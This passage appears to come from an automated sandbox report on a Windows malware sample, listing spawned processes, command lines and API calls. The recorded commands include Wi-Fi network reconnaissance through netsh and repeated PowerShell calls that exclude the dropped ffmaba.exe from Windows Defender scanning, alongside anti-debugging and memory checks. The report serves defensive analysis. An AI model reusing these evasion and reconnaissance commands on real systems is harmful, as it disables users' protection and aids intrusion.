                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /R /C:"[ ]:[ ]"
                                                                          Imagebase:0x9e0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:33
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:34
                                                                          Start time:09:47:11
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                          Wow64 process (32bit):true
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x1f0000
                                                                          File size:12'800 bytes
                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:09:47:11
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:netsh wlan show networks mode=bssid
                                                                          Imagebase:0x1080000
                                                                          File size:82'432 bytes
                                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:09:47:11
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr "SSID BSSID Signal"
                                                                          Imagebase:0x9e0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:39
                                                                          Start time:09:48:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0xb30000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:40
                                                                          Start time:09:48:01
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:41
                                                                          Start time:09:48:01
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:42
                                                                          Start time:09:49:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0x270000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:43
                                                                          Start time:09:49:02
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:44
                                                                          Start time:09:49:03
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff757150000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:45
                                                                          Start time:09:50:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0xa50000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:46
                                                                          Start time:09:50:03
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:47
                                                                          Start time:09:50:03
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:34
                                                                            Total number of Limit Nodes:4

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 b5d740-b5d7cf GetCurrentProcess 299 b5d7d1-b5d7d7 295->299 300 b5d7d8-b5d80c GetCurrentThread 295->300 299->300 301 b5d815-b5d849 GetCurrentProcess 300->301 302 b5d80e-b5d814 300->302 304 b5d852-b5d86a 301->304 305 b5d84b-b5d851 301->305 302->301 308 b5d873-b5d8a2 GetCurrentThreadId 304->308 305->304 309 b5d8a4-b5d8aa 308->309 310 b5d8ab-b5d90d 308->310 309->310
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00B5D7BE
                                                                            • GetCurrentThread.KERNEL32 ref: 00B5D7FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 00B5D838
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00B5D891
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: c4768d171e16667a2ded9634a2598b8519f9743a5e8063c437802e5af15e0446
                                                                            • Instruction ID: 7f9aaa0f9d7e80f3f29bd5aeae60ed58c0729a4c7e86d06af05131209a555b7b
                                                                            • Opcode Fuzzy Hash: c4768d171e16667a2ded9634a2598b8519f9743a5e8063c437802e5af15e0446
                                                                            • Instruction Fuzzy Hash: 895155B19002098FDB14CFA9D948B9EFBF1EF88318F248599E408A7360D774A948CF65

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 338 b558ec-b559b9 CreateActCtxA 340 b559c2-b55a1c 338->340 341 b559bb-b559c1 338->341 348 b55a1e-b55a21 340->348 349 b55a2b-b55a2f 340->349 341->340 348->349 350 b55a31-b55a3d 349->350 351 b55a40 349->351 350->351 352 b55a41 351->352 352->352
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 4218c444169a9383edac6b2380d5482b9f7188ccd91d2515e36d373ad2fd6897
                                                                            • Instruction ID: 9f7ce928a3d4434fc460814de2dc2d9608a2f115e99af966ed9096f402ec8cc9
                                                                            • Opcode Fuzzy Hash: 4218c444169a9383edac6b2380d5482b9f7188ccd91d2515e36d373ad2fd6897
                                                                            • Instruction Fuzzy Hash: 9641CFB0C00719CEDB24DFA9C884BDEBBF6BF49305F24819AD409AB251DB756949CF60

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 354 b544b4-b559b9 CreateActCtxA 357 b559c2-b55a1c 354->357 358 b559bb-b559c1 354->358 365 b55a1e-b55a21 357->365 366 b55a2b-b55a2f 357->366 358->357 365->366 367 b55a31-b55a3d 366->367 368 b55a40 366->368 367->368 369 b55a41 368->369 369->369
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 73d95cfa30dae57f3d8382bc6f4d3b329063cf0db953edc940774b90aee99c06
                                                                            • Instruction ID: 81587fe8b9aaf687a3ceba102add8fc93d2b2a57f9884b2e56af948c62fb9273
                                                                            • Opcode Fuzzy Hash: 73d95cfa30dae57f3d8382bc6f4d3b329063cf0db953edc940774b90aee99c06
                                                                            • Instruction Fuzzy Hash: D941B0B0C00719CBDB24DFA9C884B9EBBF5FF49305F2081AAD409AB251DB756949CF90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 371 b5d988-b5da1c DuplicateHandle 372 b5da25-b5da42 371->372 373 b5da1e-b5da24 371->373 373->372
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5DA0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 8d176b2e3e1c0677200a536907bd91876e17f664db27fbc9e0df8dd0a41ca8f4
                                                                            • Instruction ID: deb41646fecfda4847c4d12002db3aade169e3fda6b2de6f59d2d6b183c52115
                                                                            • Opcode Fuzzy Hash: 8d176b2e3e1c0677200a536907bd91876e17f664db27fbc9e0df8dd0a41ca8f4
                                                                            • Instruction Fuzzy Hash: 8021E4B5900209DFDB10CF9AD984ADEBBF8FB48310F14805AE914A3310D374A944CFA1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 376 b5aeb0-b5b960 378 b5b962-b5b965 376->378 379 b5b968-b5b997 LoadLibraryExW 376->379 378->379 380 b5b9a0-b5b9bd 379->380 381 b5b999-b5b99f 379->381 381->380
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B5B779,00000800,00000000,00000000), ref: 00B5B98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: a3d0aa2c0c703588e3d021b99379055165ae5bd0a77a53ca19ed53a00496d4cc
                                                                            • Instruction ID: aaf7b0be7c8fbaf0dc6ba4d8d2e62a81529bf4fb703a5c34b695eca276476008
                                                                            • Opcode Fuzzy Hash: a3d0aa2c0c703588e3d021b99379055165ae5bd0a77a53ca19ed53a00496d4cc
                                                                            • Instruction Fuzzy Hash: 5B11E4B69003099FDB10CF9AD484BEEFBF4EB48310F14846EE919A7200C375A945CFA5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 384 b5b698-b5b6d8 385 b5b6e0-b5b70b GetModuleHandleW 384->385 386 b5b6da-b5b6dd 384->386 387 b5b714-b5b728 385->387 388 b5b70d-b5b713 385->388 386->385 388->387
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00B5B6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 008c0d3084e9d5b8891f8519726f67a618c59eab67534022048938b07ce57326
                                                                            • Instruction ID: 1ed7f24e7a8ebef87e9f913f8e60d20e4b1bc31d278336b916a2fbff1a969667
                                                                            • Opcode Fuzzy Hash: 008c0d3084e9d5b8891f8519726f67a618c59eab67534022048938b07ce57326
                                                                            • Instruction Fuzzy Hash: 8811DFB6C00249CFCB10CF9AD844B9EFBF4EB88324F14845AD819A7611D379A949CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4473637752ba48fe08f50a1da548b6efc40a18f1e681453c819fd0d116127020
                                                                            • Instruction ID: fd511169231fbd8344813e067319dc45655fec643202f7379937a8a003507306
                                                                            • Opcode Fuzzy Hash: 4473637752ba48fe08f50a1da548b6efc40a18f1e681453c819fd0d116127020
                                                                            • Instruction Fuzzy Hash: A021F275604200DFDB25DF24D9C4B26BB65EB88325F24C96DDC0A4B296C33AD80BCB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d2e136bbdc3dcb5a113cc01a0097460ade263ec4b1e5886f80860b664984d651
                                                                            • Instruction ID: 70dc06bef5f268da648fd3dedef70f7f9d54157794d664790565f1ef3cc4b379
                                                                            • Opcode Fuzzy Hash: d2e136bbdc3dcb5a113cc01a0097460ade263ec4b1e5886f80860b664984d651
                                                                            • Instruction Fuzzy Hash: C52181755093C08FDB16CF24D994B15BF71EB46314F28C5EAD8498B6A7C33A980ACB62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: bff9efac8f98e0615355f4767375f454afaf4435ed17f45ed864532d210bd2c9
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 6411E67A504240DFDB16CF14D5C4B16BF72FB94324F24C6A9D9090B6A6C33AE85ACBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: 65300ab5239bd3985655b59cec3770c92acf5b2b5f7529e3c655f3bae67cdd6b
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: E311E676504280CFDB16CF14D5C4F16BF71FB94324F24C6A9E8494B65AC33AD85ACBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 8b3e0072c953a0aa4324dc6c0de111292c0d707a543396975095fcb20ea15dc7
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: 9E118B75505280DFDB16CF14D5C4B15BBA1FB84314F24C6ADDC494B696C33AD84ACB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 576a1af08675071cab34cf812e41d293527e2380b4d5ee43d61c333cffa0f646
                                                                            • Instruction ID: ea892c33cef53004302320594155f85191c97e6521f7512ec2541f4cdf6344ed
                                                                            • Opcode Fuzzy Hash: 576a1af08675071cab34cf812e41d293527e2380b4d5ee43d61c333cffa0f646
                                                                            • Instruction Fuzzy Hash: E201A2B51063449AE7219B69CD84F66BFACEF52734F28C95AED090A287C3799840C6B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f9095ed6265f5d99e2638dc452b3d5d5f1655d9ab2a5ef028cfdb805fbb855b
                                                                            • Instruction ID: a7f16e6e65eec6c0e3a3c7d4caceb83e0c925e30ff94bc5d4995ee2533bbcc1f
                                                                            • Opcode Fuzzy Hash: 8f9095ed6265f5d99e2638dc452b3d5d5f1655d9ab2a5ef028cfdb805fbb855b
                                                                            • Instruction Fuzzy Hash: D3F062764053449EE7208B56DD84B62FFACEF51734F18C45AED085A287C3799844CAB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a27a8156a1417909e91fdc964a107b741d0f4a3625eb415a4dbb8cb6ece5cfc0
                                                                            • Instruction ID: ac62652c6e774c343bfe8c1111ba35f9b9613c909e41d0ba902bfdbf41172d93
                                                                            • Opcode Fuzzy Hash: a27a8156a1417909e91fdc964a107b741d0f4a3625eb415a4dbb8cb6ece5cfc0
                                                                            • Instruction Fuzzy Hash: D2A14F32A006068FCF0ADFB5C844AAEB7F2FF85301B1545FAE815AB265DB31D959CB40

                                                                            Execution Graph

                                                                            Execution Coverage:15.1%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:39
                                                                            Total number of Limit Nodes:4
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 02A9AD57
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4511972409.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2a90000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0657160F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4540504029.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6570000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: {Yxo^$Yxo^
                                                                            • API String ID: 0-3563231153
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$pij$pij$pij$pij$pij$|,j$J!l$J!l$J!l$J!l$J!l$J!l$r l$r l
                                                                            • API String ID: 0-1074802320
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$4'cq$4'cq
                                                                            • API String ID: 0-1446110543
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (gq
                                                                            • API String ID: 0-1972435379
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (&cq
                                                                            • API String ID: 0-298851153
                                                                            • Opcode ID: bcb1e88f3349902be8e5e9247dfd475e39829f3b2aeed9ae1522bf074f95f23c
                                                                            • Instruction ID: d60886779f845ae032390d083e438aa046a7ef529ead64b7a152a68c349c0704
                                                                            • Opcode Fuzzy Hash: bcb1e88f3349902be8e5e9247dfd475e39829f3b2aeed9ae1522bf074f95f23c
                                                                            • Instruction Fuzzy Hash: C621B275A046588FCB24DFAED84069EFBF5EF89320F14846AD419E7340CB759805CBE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +/xo^
                                                                            • API String ID: 0-900678728
                                                                            • Opcode ID: fa6b6566cbd6891c33306220c4ce9192bfe1f97da826977b6a6b9a8db28095bd
                                                                            • Instruction ID: 1196623a200c86a20e1e278d17fa038e6e79eac73a1302b50fd5c397726de053
                                                                            • Opcode Fuzzy Hash: fa6b6566cbd6891c33306220c4ce9192bfe1f97da826977b6a6b9a8db28095bd
                                                                            • Instruction Fuzzy Hash: 7DF0F63A645E446F8B16E61DA8B08EEBB6EDEC56B13444457E40ACFE02DB60480443F5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +/xo^
                                                                            • API String ID: 0-900678728
                                                                            • Opcode ID: baba2013889c8fcf5b44e8ee84c14e038d1d5d2a8e07166e65178c18e207da4f
                                                                            • Instruction ID: c82bbf04e80718a90776beaf4e34dd3a26b75bb503f2c0c07a0b2e3fc8ea0dba
                                                                            • Opcode Fuzzy Hash: baba2013889c8fcf5b44e8ee84c14e038d1d5d2a8e07166e65178c18e207da4f
                                                                            • Instruction Fuzzy Hash: 86E0C239740A140B8716E61EA86089F77EADFC5672354842EF11ACB740EF64DC0587D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
